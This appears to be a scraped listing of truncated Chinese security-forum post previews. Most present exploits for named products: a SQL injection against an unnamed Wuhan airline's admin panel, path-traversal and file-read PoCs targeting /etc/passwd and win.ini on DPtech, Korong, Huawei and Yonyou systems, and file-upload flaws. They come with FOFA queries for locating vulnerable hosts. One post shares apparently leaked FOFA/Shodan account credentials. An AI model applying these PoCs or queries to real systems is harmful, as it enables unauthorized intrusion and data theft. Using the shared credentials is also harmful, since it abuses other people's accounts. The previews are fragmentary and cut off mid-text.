武汉某航空公司sql注入(水一篇文章)
一.通过arl灯塔收集资产信息,灯塔魔改版是真的不错,推荐使用二.打开某xx.xxx.com,发现是一个后台,进入url就报错,盲猜存在sql注入漏洞三.打开网站,发现这个后台也太老点,后台嘛肯定先测试一下弱口令,测试了一波,发现验证码可以重复使用,但是没有爆破出来四,登录用burp抓包,复制数据包,打开sqlmap一把梭伍.存在sql注入,爆破数据库,现在就可以提交了,点到位置,这是
Tenda 路由器 DownloadCfg 信息泄露漏洞(附nuclei poc)
#CTL{\n}漏洞描述#CTL{\n}Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。#CTL{\n}漏洞复现#CTL{\n}1、Fofa#CTL{\n}title="Tenda | LOGIN"#CTL{\n}#CTL{\n}![](htt
(安全工具)Ladon 12.0
工具 Ladon 12.0 20231201[+]DomainLog DomainUserIP 远程查询 域用户、IP[u]LoginLog 4624成功日志 域用户、域名、登陆IP/all 导出全部日志 原始数据LoginLog 用户名LoginLog 用户名 记录数
(安全工具)xscan2.2最新版
w8ay更新:xscan 2.2发布新增爬虫导出选项 -output-spider spiderjsonlcrlf自动探测加入 use_spider_dsl配置可选是否使用dsl脚本探测加入hidden_parameters配置可自定义隐藏参数通过百度网盘分享的文件:xscan链接:https://pan.baidu.com/s/1Svg3suy-8puC2OWa2ZPPhw?pwd=u4h6提取
科荣 AIO 管理系统 文件读取poc
fofa:#CTL{\n}body="changeAccount('8000')"#CTL{\n}#CTL{\n}#CTL{\n}poc:#CTL{\n}#CTL{\n}post /UtilServlet#CTL{\n}#CTL{\n}operation=readErrorExcel&fileName=C:\windows/win.in
迪普SSL VPN Service img 接口存在任意文件下载漏洞(poc)
迪普SSL VPN Service img 接口存在任意文件下载漏洞fofa:body=”SSL VPN” && (banner=”Dptech” || header=”Dptech”)app=”DPtech-SSLVPN”poc:/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
src资产收集必备工具,fofa高级会员,shodan工具(有API key,绝对值得这个价,切勿外传)
1.fofa高级会员 https://www.starpoc.vip/fofa/" class="reference-link">1.fofa高级会员https://www.starpoc.vip/fofa/FOFA小工具解锁密码:5b347260f5fdfa9d2e84ab20c361131chttps://fofa.mhtsec.com账号密码:m
华为Auth-Http Server 1.0任意文件读取
## 1.漏洞描述#CTL{\n}华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。#CTL{\n}#CTL{\n}## 2.网络资产查找#CTL{\n}**FOFA:server="Huawei Auth-Http Server 1.0"**#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/4
浙大恩特客户资源管理系统任意文件上传漏洞
## 漏洞描述#CTL{\n}浙大恩特客户资源管理系统是恩特软件开发的一款客户资源管理系统。浙大恩特客户资源管理系统 fileupload.jsp 存在任意文件上传漏洞。攻击者可通过该漏洞在服务器端上传后门,执行代码,获取服务器权限,进而控制整个 web 服务器。#CTL{\n}漏洞复现#CTL{\n}## 1、Fofa语法#CTL{\n}title="欢迎使用浙大恩特客户资源管
(复现)用友NC 任意文件上传漏洞
漏洞简介#CTL{\n}用友NC存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。#CTL{\n}#CTL{\n}漏洞复现#CTL{\n}fofa语法:app="用友-UFIDA-NC"#CTL{\n}登录页面#CTL{\n}#CT